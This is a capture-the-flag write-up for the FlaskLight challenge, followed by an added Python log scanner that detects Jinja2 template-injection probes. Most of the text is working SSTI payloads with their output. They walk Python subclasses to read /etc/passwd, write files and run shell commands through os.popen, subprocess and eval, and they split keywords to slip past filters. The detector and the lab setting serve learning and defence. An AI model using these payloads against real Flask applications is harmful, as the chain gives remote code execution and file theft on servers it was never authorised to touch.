[CSCCTF 2019 Qual] FlaskLight

Press F12 to look at the page source.

Capture the request with Burp Suite.

From this we conclude it is Jinja2 template injection (SSTI).

1. Get the configuration
{{config}} 

?search={{ ''.__class__.__mro__}}

You searched for:

(<type 'str'>, <type 'basestring'>, <type 'object'>)

?search={{ ''.__class__.__mro__[2].__subclasses__()}}

You searched for:
?search=[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'string.Template'>, <class 'string.Formatter'>, <type 'collections.deque'>, <type 'deque_iterator'>, <type 'deque_reverse_iterator'>, <type 
'operator.itemgetter'>, <type 'operator.attrgetter'>, <type 'operator.methodcaller'>, <type 'itertools.combinations'>, <type 'itertools.combinations_with_replacement'>, <type 'itertools.cycle'>, <type 'itertools.dropwhile'>, <type 'itertools.takewhile'>, <type 'itertools.islice'>, <type 'itertools.starmap'>, <type 'itertools.imap'>, <type 'itertools.chain'>, <type 'itertools.compress'>, <type 'itertools.ifilter'>, <type 'itertools.ifilterfalse'>, <type 'itertools.count'>, <type 'itertools.izip'>, <type 'itertools.izip_longest'>, <type 'itertools.permutations'>, <type 'itertools.product'>, <type 'itertools.repeat'>, <type 'itertools.groupby'>, <type 'itertools.tee_dataobject'>, <type 'itertools.tee'>, <type 'itertools._grouper'>, <type '_thread._localdummy'>, <type 'thread._local'>, <type 'thread.lock'>, <type 'method_descriptor'>, <class 'markupsafe._MarkupEscapeHelper'>, <type '_io._IOBase'>, <type '_io.IncrementalNewlineDecoder'>, <type '_hashlib.HASH'>, <type '_random.Random'>, <type 'cStringIO.StringO'>, <type 'cStringIO.StringI'>, <type 'cPickle.Unpickler'>, <type 'cPickle.Pickler'>, <type 'functools.partial'>, <type '_ssl._SSLContext'>, <type '_ssl._SSLSocket'>, <class 'socket._closedsocket'>, <type '_socket.socket'>, <class 'socket._socketobject'>, <class 'socket._fileobject'>, <type 'time.struct_time'>, <type 'Struct'>, <class 'urlparse.ResultMixin'>, <class 'contextlib.GeneratorContextManager'>, <class 'contextlib.closing'>, <type '_json.Scanner'>, <type '_json.Encoder'>, <class 'json.decoder.JSONDecoder'>, <class 'json.encoder.JSONEncoder'>, <class 'threading._Verbose'>, <class 'jinja2.utils.MissingType'>, <class 'jinja2.utils.LRUCache'>, <class 'jinja2.utils.Cycler'>, <class 'jinja2.utils.Joiner'>, <class 'jinja2.utils.Namespace'>, <class 'jinja2.bccache.Bucket'>, <class 'jinja2.bccache.BytecodeCache'>, <class 'jinja2.nodes.EvalContext'>, <class 'jinja2.visitor.NodeVisitor'>, <class 'jinja2.nodes.Node'>, <class 'jinja2.idtracking.Symbols'>, <class 
'jinja2.compiler.MacroRef'>, <class 'jinja2.compiler.Frame'>, <class 'jinja2.runtime.TemplateReference'>, <class 'numbers.Number'>, <class 'jinja2.runtime.Context'>, <class 'jinja2.runtime.BlockReference'>, <class 'jinja2.runtime.Macro'>, <class 'jinja2.runtime.Undefined'>, <class 'decimal.Decimal'>, <class 'decimal._ContextManager'>, <class 'decimal.Context'>, <class 'decimal._WorkRep'>, <class 'decimal._Log10Memoize'>, <type '_ast.AST'>, <class 'ast.NodeVisitor'>, <class 'jinja2.lexer.Failure'>, <class 'jinja2.lexer.TokenStreamIterator'>, <class 'jinja2.lexer.TokenStream'>, <class 'jinja2.lexer.Lexer'>, <class 'jinja2.parser.Parser'>, <class 'jinja2.environment.Environment'>, <class 'jinja2.environment.Template'>, <class 'jinja2.environment.TemplateModule'>, <class 'jinja2.environment.TemplateExpression'>, <class 'jinja2.environment.TemplateStream'>, <class 'jinja2.loaders.BaseLoader'>, <type 'datetime.date'>, <type 'datetime.timedelta'>, <type 'datetime.time'>, <type 'datetime.tzinfo'>, <class 'logging.LogRecord'>, <class 'logging.Formatter'>, <class 'logging.BufferingFormatter'>, <class 'logging.Filter'>, <class 'logging.Filterer'>, <class 'logging.PlaceHolder'>, <class 'logging.Manager'>, <class 'logging.LoggerAdapter'>, <class 'werkzeug._internal._Missing'>, <class 'werkzeug._internal._DictAccessorProperty'>, <class 'werkzeug.utils.HTMLBuilder'>, <class 'werkzeug.exceptions.Aborter'>, <class 'werkzeug.urls.Href'>, <type 'select.epoll'>, <class 'click._compat._FixupStream'>, <class 'click._compat._AtomicFile'>, <class 'click.utils.LazyFile'>, <class 'click.utils.KeepOpenFile'>, <class 'click.utils.PacifyFlushWrapper'>, <class 'click.parser.Option'>, <class 'click.parser.Argument'>, <class 'click.parser.ParsingState'>, <class 'click.parser.OptionParser'>, <class 'click.types.ParamType'>, <class 'click.formatting.HelpFormatter'>, <class 'click.core.Context'>, <class 'click.core.BaseCommand'>, <class 'click.core.Parameter'>, <class 
'werkzeug.serving.WSGIRequestHandler'>, <class 'werkzeug.serving._SSLContext'>, <class 'werkzeug.serving.BaseWSGIServer'>, <class 'werkzeug.datastructures.ImmutableListMixin'>, <class 'werkzeug.datastructures.ImmutableDictMixin'>, <class 'werkzeug.datastructures.UpdateDictMixin'>, <class 'werkzeug.datastructures.ViewItems'>, <class 'werkzeug.datastructures._omd_bucket'>, <class 'werkzeug.datastructures.Headers'>, <class 'werkzeug.datastructures.ImmutableHeadersMixin'>, <class 'werkzeug.datastructures.IfRange'>, <class 'werkzeug.datastructures.Range'>, <class 'werkzeug.datastructures.ContentRange'>, <class 'werkzeug.datastructures.FileStorage'>, <class 'email.LazyImporter'>, <class 'calendar.Calendar'>, <class 'werkzeug.wrappers.accept.AcceptMixin'>, <class 'werkzeug.wrappers.auth.AuthorizationMixin'>, <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>, <class 'werkzeug.wsgi.ClosingIterator'>, <class 'werkzeug.wsgi.FileWrapper'>, <class 'werkzeug.wsgi._RangeWrapper'>, <class 'werkzeug.formparser.FormDataParser'>, <class 'werkzeug.formparser.MultiPartParser'>, <class 'werkzeug.wrappers.base_request.BaseRequest'>, <class 'werkzeug.wrappers.base_response.BaseResponse'>, <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>, <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>, <class 'werkzeug.wrappers.etag.ETagRequestMixin'>, <class 'werkzeug.wrappers.etag.ETagResponseMixin'>, <class 'werkzeug.wrappers.cors.CORSRequestMixin'>, <class 'werkzeug.wrappers.cors.CORSResponseMixin'>, <class 'werkzeug.useragents.UserAgentParser'>, <class 'werkzeug.useragents.UserAgent'>, <class 'werkzeug.wrappers.user_agent.UserAgentMixin'>, <class 'werkzeug.wrappers.request.StreamOnlyMixin'>, <class 'werkzeug.wrappers.response.ResponseStream'>, <class 'werkzeug.wrappers.response.ResponseStreamMixin'>, <class 'werkzeug.test._TestCookieHeaders'>, <class 'werkzeug.test._TestCookieResponse'>, <class 'werkzeug.test.EnvironBuilder'>, <class 
'werkzeug.test.Client'>, <class 'uuid.UUID'>, <type 'CArgObject'>, <type '_ctypes.CThunkObject'>, <type '_ctypes._CData'>, <type '_ctypes.CField'>, <type '_ctypes.DictRemover'>, <class 'ctypes.CDLL'>, <class 'ctypes.LibraryLoader'>, <class 'subprocess.Popen'>, <class 'itsdangerous._json._CompactJSON'>, <class 'itsdangerous.signer.SigningAlgorithm'>, <class 'itsdangerous.signer.Signer'>, <class 'itsdangerous.serializer.Serializer'>, <class 'itsdangerous.url_safe.URLSafeSerializerMixin'>, <class 'flask._compat._DeprecatedBool'>, <class 'werkzeug.local.Local'>, <class 'werkzeug.local.LocalStack'>, <class 'werkzeug.local.LocalManager'>, <class 'werkzeug.local.LocalProxy'>, <class 'difflib.HtmlDiff'>, <class 'werkzeug.routing.RuleFactory'>, <class 'werkzeug.routing.RuleTemplate'>, <class 'werkzeug.routing.BaseConverter'>, <class 'werkzeug.routing.Map'>, <class 'werkzeug.routing.MapAdapter'>, <class 'flask.signals.Namespace'>, <class 'flask.signals._FakeSignal'>, <class 'flask.helpers.locked_cached_property'>, <class 'flask.helpers._PackageBoundObject'>, <class 'flask.cli.DispatchingApp'>, <class 'flask.cli.ScriptInfo'>, <class 'flask.config.ConfigAttribute'>, <class 'flask.ctx._AppCtxGlobals'>, <class 'flask.ctx.AppContext'>, <class 'flask.ctx.RequestContext'>, <class 'flask.json.tag.JSONTag'>, <class 'flask.json.tag.TaggedJSONSerializer'>, <class 'flask.sessions.SessionInterface'>, <class 'werkzeug.wrappers.json._JSONModule'>, <class 'werkzeug.wrappers.json.JSONMixin'>, <class 'flask.blueprints.BlueprintSetupState'>, <type 'unicodedata.UCD'>, <type 'array.array'>, <type 'method-wrapper'>, <class 'jinja2.ext.Extension'>, <class 'jinja2.ext._CommentFinder'>]

Usable classes: <type 'file'>, <class 'site._Printer'>, <class 'subprocess.Popen'>, <class 'warnings.catch_warnings'>. We also found that os is not preloaded in the globals, so it has to be imported.

Reference:

1. <type 'file'>: read and write files. The file class is usually at index 40, so it can be called directly:
{{"".__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}}
{{().__class__.__base__.__subclasses__()[40]('/var/www/html/input.txt', 'w').write('hello123')}}

2. <class 'site._Printer'>: run commands directly through os.popen (bypassing a filter on the string "globals"):
{{"".__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}
If "system" is filtered, use os.listdir to list the directory and the file class to read files:
{{().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

3. <class 'subprocess.Popen'>: run commands:
{{''.__class__.__mro__[1].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

4. <class 'warnings.catch_warnings'>: run commands
by calling eval:
{{[].__class__.__base__.__subclasses__()[59].__init__['__globals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}
{{''.__class__.__base__.__subclasses__()[59].__init__.__globals__.__builtins__['__import__']('os').__dict__['popen']('ls').read()}}

The os module is not loaded, so it has to be imported inside the payload when running commands.

# Read and write files: read(), write()
{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()}}

Calling the system method (the payload does not contain the string "system", so it bypasses a filter on it):
{{[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.values()[144]('whoami')}}
Using the commands module for command execution:
{{{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('commands').getstatusoutput('ls')}}

Do some simple processing of this output: replace the < and > around each entry with double quotes, put the entries in a list, and use list.index to print the position of the class we want.

Script to find the index to use after __subclasses__():

list = ["type 'type'", "type 'weakref'", "type 'weakcallableproxy'", "type 'weakproxy'", "type 'int'", "type 'basestring'", "type 'bytearray'", "type 'list'", "type 'NoneType'", "type 'NotImplementedType'", "type 'traceback'", "type 'super'", "type 'xrange'", "type 'dict'", "type 'set'", "type 'slice'", "type 'staticmethod'", "type 'complex'", "type 'float'", "type 'buffer'", "type 'long'", "type 'frozenset'", "type 'property'", "type 'memoryview'", "type 'tuple'", "type 'enumerate'", "type 'reversed'", "type 'code'", "type 'frame'", "type 'builtin_function_or_method'", "type 'instancemethod'", "type 'function'", "type 'classobj'", "type 'dictproxy'", "type 'generator'", "type 'getset_descriptor'", "type 'wrapper_descriptor'", "type 'instance'", "type 'ellipsis'", "type 'member_descriptor'", "type 'file'", "type 'PyCapsule'", "type 'cell'", "type 'callable-iterator'", "type 'iterator'", "type 'sys.long_info'", "type 'sys.float_info'", "type 'EncodingMap'", "type 'fieldnameiterator'", "type 'formatteriterator'", "type 'sys.version_info'", "type 'sys.flags'", "type 'exceptions.BaseException'", "type 'module'", "type 'imp.NullImporter'", "type 'zipimport.zipimporter'", "type 'posix.stat_result'", "type 'posix.statvfs_result'", "class 'warnings.WarningMessage'", "class 'warnings.catch_warnings'", "class '_weakrefset._IterationGuard'", "class '_weakrefset.WeakSet'", "class '_abcoll.Hashable'", "type 'classmethod'", "class '_abcoll.Iterable'", "class '_abcoll.Sized'", "class '_abcoll.Container'", "class '_abcoll.Callable'", "type 'dict_keys'", "type 'dict_items'", "type 'dict_values'", "class 'site._Printer'", "class 'site._Helper'", "type '_sre.SRE_Pattern'", "type '_sre.SRE_Match'", "type '_sre.SRE_Scanner'", "class 'site.Quitter'", "class 'codecs.IncrementalEncoder'", "class 'codecs.IncrementalDecoder'", "class 'string.Template'", "class 'string.Formatter'", "type 'collections.deque'", "type 'deque_iterator'", "type 'deque_reverse_iterator'", "type 
'operator.itemgetter'", "type 'operator.attrgetter'", "type 'operator.methodcaller'", "type 'itertools.combinations'", "type 'itertools.combinations_with_replacement'", "type 'itertools.cycle'", "type 'itertools.dropwhile'", "type 'itertools.takewhile'", "type 'itertools.islice'", "type 'itertools.starmap'", "type 'itertools.imap'", "type 'itertools.chain'", "type 'itertools.compress'", "type 'itertools.ifilter'", "type 'itertools.ifilterfalse'", "type 'itertools.count'", "type 'itertools.izip'", "type 'itertools.izip_longest'", "type 'itertools.permutations'", "type 'itertools.product'", "type 'itertools.repeat'", "type 'itertools.groupby'", "type 'itertools.tee_dataobject'", "type 'itertools.tee'", "type 'itertools._grouper'", "type '_thread._localdummy'", "type 'thread._local'", "type 'thread.lock'", "type 'method_descriptor'", "class 'markupsafe._MarkupEscapeHelper'", "type '_io._IOBase'", "type '_io.IncrementalNewlineDecoder'", "type '_hashlib.HASH'", "type '_random.Random'", "type 'cStringIO.StringO'", "type 'cStringIO.StringI'", "type 'cPickle.Unpickler'", "type 'cPickle.Pickler'", "type 'functools.partial'", "type '_ssl._SSLContext'", "type '_ssl._SSLSocket'", "class 'socket._closedsocket'", "type '_socket.socket'", "class 'socket._socketobject'", "class 'socket._fileobject'", "type 'time.struct_time'", "type 'Struct'", "class 'urlparse.ResultMixin'", "class 'contextlib.GeneratorContextManager'", "class 'contextlib.closing'", "type '_json.Scanner'", "type '_json.Encoder'", "class 'json.decoder.JSONDecoder'", "class 'json.encoder.JSONEncoder'", "class 'threading._Verbose'", "class 'jinja2.utils.MissingType'", "class 'jinja2.utils.LRUCache'", "class 'jinja2.utils.Cycler'", "class 'jinja2.utils.Joiner'", "class 'jinja2.utils.Namespace'", "class 'jinja2.bccache.Bucket'", "class 'jinja2.bccache.BytecodeCache'", "class 'jinja2.nodes.EvalContext'", "class 'jinja2.visitor.NodeVisitor'", "class 'jinja2.nodes.Node'", "class 'jinja2.idtracking.Symbols'", "class 
'jinja2.compiler.MacroRef'", "class 'jinja2.compiler.Frame'", "class 'jinja2.runtime.TemplateReference'", "class 'numbers.Number'", "class 'jinja2.runtime.Context'", "class 'jinja2.runtime.BlockReference'", "class 'jinja2.runtime.Macro'", "class 'jinja2.runtime.Undefined'", "class 'decimal.Decimal'", "class 'decimal._ContextManager'", "class 'decimal.Context'", "class 'decimal._WorkRep'", "class 'decimal._Log10Memoize'", "type '_ast.AST'", "class 'ast.NodeVisitor'", "class 'jinja2.lexer.Failure'", "class 'jinja2.lexer.TokenStreamIterator'", "class 'jinja2.lexer.TokenStream'", "class 'jinja2.lexer.Lexer'", "class 'jinja2.parser.Parser'", "class 'jinja2.environment.Environment'", "class 'jinja2.environment.Template'", "class 'jinja2.environment.TemplateModule'", "class 'jinja2.environment.TemplateExpression'", "class 'jinja2.environment.TemplateStream'", "class 'jinja2.loaders.BaseLoader'", "type 'datetime.date'", "type 'datetime.timedelta'", "type 'datetime.time'", "type 'datetime.tzinfo'", "class 'logging.LogRecord'", "class 'logging.Formatter'", "class 'logging.BufferingFormatter'", "class 'logging.Filter'", "class 'logging.Filterer'", "class 'logging.PlaceHolder'", "class 'logging.Manager'", "class 'logging.LoggerAdapter'", "class 'werkzeug._internal._Missing'", "class 'werkzeug._internal._DictAccessorProperty'", "class 'werkzeug.utils.HTMLBuilder'", "class 'werkzeug.exceptions.Aborter'", "class 'werkzeug.urls.Href'", "type 'select.epoll'", "class 'click._compat._FixupStream'", "class 'click._compat._AtomicFile'", "class 'click.utils.LazyFile'", "class 'click.utils.KeepOpenFile'", "class 'click.utils.PacifyFlushWrapper'", "class 'click.parser.Option'", "class 'click.parser.Argument'", "class 'click.parser.ParsingState'", "class 'click.parser.OptionParser'", "class 'click.types.ParamType'", "class 'click.formatting.HelpFormatter'", "class 'click.core.Context'", "class 'click.core.BaseCommand'", "class 'click.core.Parameter'", "class 
'werkzeug.serving.WSGIRequestHandler'", "class 'werkzeug.serving._SSLContext'", "class 'werkzeug.serving.BaseWSGIServer'", "class 'werkzeug.datastructures.ImmutableListMixin'", "class 'werkzeug.datastructures.ImmutableDictMixin'", "class 'werkzeug.datastructures.UpdateDictMixin'", "class 'werkzeug.datastructures.ViewItems'", "class 'werkzeug.datastructures._omd_bucket'", "class 'werkzeug.datastructures.Headers'", "class 'werkzeug.datastructures.ImmutableHeadersMixin'", "class 'werkzeug.datastructures.IfRange'", "class 'werkzeug.datastructures.Range'", "class 'werkzeug.datastructures.ContentRange'", "class 'werkzeug.datastructures.FileStorage'", "class 'email.LazyImporter'", "class 'calendar.Calendar'", "class 'werkzeug.wrappers.accept.AcceptMixin'", "class 'werkzeug.wrappers.auth.AuthorizationMixin'", "class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'", "class 'werkzeug.wsgi.ClosingIterator'", "class 'werkzeug.wsgi.FileWrapper'", "class 'werkzeug.wsgi._RangeWrapper'", "class 'werkzeug.formparser.FormDataParser'", "class 'werkzeug.formparser.MultiPartParser'", "class 'werkzeug.wrappers.base_request.BaseRequest'", "class 'werkzeug.wrappers.base_response.BaseResponse'", "class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'", "class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'", "class 'werkzeug.wrappers.etag.ETagRequestMixin'", "class 'werkzeug.wrappers.etag.ETagResponseMixin'", "class 'werkzeug.wrappers.cors.CORSRequestMixin'", "class 'werkzeug.wrappers.cors.CORSResponseMixin'", "class 'werkzeug.useragents.UserAgentParser'", "class 'werkzeug.useragents.UserAgent'", "class 'werkzeug.wrappers.user_agent.UserAgentMixin'", "class 'werkzeug.wrappers.request.StreamOnlyMixin'", "class 'werkzeug.wrappers.response.ResponseStream'", "class 'werkzeug.wrappers.response.ResponseStreamMixin'", "class 'werkzeug.test._TestCookieHeaders'", "class 'werkzeug.test._TestCookieResponse'", "class 'werkzeug.test.EnvironBuilder'", "class 
'werkzeug.test.Client'", "class 'uuid.UUID'", "type 'CArgObject'", "type '_ctypes.CThunkObject'", "type '_ctypes._CData'", "type '_ctypes.CField'", "type '_ctypes.DictRemover'", "class 'ctypes.CDLL'", "class 'ctypes.LibraryLoader'", "class 'subprocess.Popen'", "class 'itsdangerous._json._CompactJSON'", "class 'itsdangerous.signer.SigningAlgorithm'", "class 'itsdangerous.signer.Signer'", "class 'itsdangerous.serializer.Serializer'", "class 'itsdangerous.url_safe.URLSafeSerializerMixin'", "class 'flask._compat._DeprecatedBool'", "class 'werkzeug.local.Local'", "class 'werkzeug.local.LocalStack'", "class 'werkzeug.local.LocalManager'", "class 'werkzeug.local.LocalProxy'", "class 'difflib.HtmlDiff'", "class 'werkzeug.routing.RuleFactory'", "class 'werkzeug.routing.RuleTemplate'", "class 'werkzeug.routing.BaseConverter'", "class 'werkzeug.routing.Map'", "class 'werkzeug.routing.MapAdapter'", "class 'flask.signals.Namespace'", "class 'flask.signals._FakeSignal'", "class 'flask.helpers.locked_cached_property'", "class 'flask.helpers._PackageBoundObject'", "class 'flask.cli.DispatchingApp'", "class 'flask.cli.ScriptInfo'", "class 'flask.config.ConfigAttribute'", "class 'flask.ctx._AppCtxGlobals'", "class 'flask.ctx.AppContext'", "class 'flask.ctx.RequestContext'", "class 'flask.json.tag.JSONTag'", "class 'flask.json.tag.TaggedJSONSerializer'", "class 'flask.sessions.SessionInterface'", "class 'werkzeug.wrappers.json._JSONModule'", "class 'werkzeug.wrappers.json.JSONMixin'", "class 'flask.blueprints.BlueprintSetupState'", "type 'unicodedata.UCD'", "class 'jinja2.ext.Extension'", "class 'jinja2.ext._CommentFinder'", "type 'array.array'", "type 'method-wrapper'"]

print(list.index("type 'file'"))
print(list.index("class 'warnings.catch_warnings'"))
print(list.index("class 'site._Printer'"))
print(list.index("class 'subprocess.Popen'"))

Output:

40
59
71
258

<type 'file'> is at index 40, so call it directly:

?search={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

You searched for:
?search=root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false
<class 'warnings.catch_warnings'> is at index 59:

?search={{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

You searched for:
bin boot dev etc flasklight home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

?search={{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls /flasklight').read()")}}

You searched for:
?search=app.py coomme_geeeett_youur_flek

?search={{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek').read()")}}

Or:

{{''.__class__.__mro__[2].__subclasses__()[40]('/flasklight/coomme_geeeett_youur_flek').read() }}

You searched for:
flag{d946a025-350c-41aa-b71b-636e062b38ec}
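The defender's counterpart to the probes above: an added example, not part of the original writeup, that scans access-log lines for the search parameter and flags Jinja2 SSTI patterns, including the '__glo'+'bals__' splicing the payloads use to dodge a naive keyword filter. The log format, IP addresses and sample lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Jinja2 expression/statement delimiters.
DELIMS = re.compile(r"\{\{|\{%")
# Attribute names the payloads chain through to reach file/eval/os.
DUNDERS = re.compile(
    r"__(?:class|mro|base|bases|subclasses|init|globals|builtins|import|dict)__"
)
# '__glo'+'bals__'-style splicing: closing quote, '+', matching opening quote.
SPLICE = re.compile(r"""(['"])\s*\+\s*\1""")
# Callables and modules the payloads end in.
SINKS = re.compile(r"\b(?:eval|popen|system|subprocess|__import__|listdir|open)\b")


def normalize(value):
    """Percent-decode until stable (catches double encoding), then join
    quoted fragments so spliced dunders are compared in joined form."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return SPLICE.sub("", value)


def classify(value):
    """Return the reasons a search value looks like a Jinja2 SSTI probe
    (empty list for benign input)."""
    v = normalize(value)
    reasons = []
    if DELIMS.search(v):
        reasons.append("jinja2 delimiter")
    if DUNDERS.search(v):
        reasons.append("dunder attribute traversal")
    if DELIMS.search(v) and re.search(r"\bconfig\b", v):
        reasons.append("config disclosure probe")
    if SINKS.search(v):
        reasons.append("dangerous sink")
    return reasons


def scan_log(lines, param="search"):
    """Parse constructed access-log lines of the form
    '<ip> "<METHOD> <path> HTTP/1.x" <status>' and return
    (ip, decoded value, reasons) for every flagged request."""
    hits = []
    for line in lines:
        m = re.match(r'(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})', line)
        if not m:
            continue
        ip, path, _status = m.groups()
        qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for raw in qs.get(param, []):
            reasons = classify(raw)
            if reasons:
                hits.append((ip, normalize(raw), reasons))
    return hits


# Constructed sample log: one benign search and three probes modelled on
# the requests in the writeup, percent-encoded as a browser would send them.
SAMPLE_LOG = [
    '10.0.0.5 "GET /?search=flask+tutorial HTTP/1.1" 200',
    '10.0.0.9 "GET /?search=%7B%7Bconfig%7D%7D HTTP/1.1" 200',
    '10.0.0.9 "GET /?search=%7B%7B%20%27%27.__class__.__mro__[2].__subclasses__()[40](%27/etc/passwd%27).read()%20%7D%7D HTTP/1.1" 200',
    '10.0.0.9 "GET /?search=%7B%7B[].__class__.__base__.__subclasses__()[59].__init__[%27__glo%27%2B%27bals__%27][%27__builtins__%27][%27eval%27](%22__import__(%27os%27).popen(%27ls%27).read()%22)%7D%7D HTTP/1.1" 200',
]

if __name__ == "__main__":
    for ip, value, reasons in scan_log(SAMPLE_LOG):
        print(ip, reasons, value[:60])
```

The real fix on the application side is to never build the template from the search value (pass it in as a context variable instead); the scanner is for spotting probes in logs of an app you cannot patch yet.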
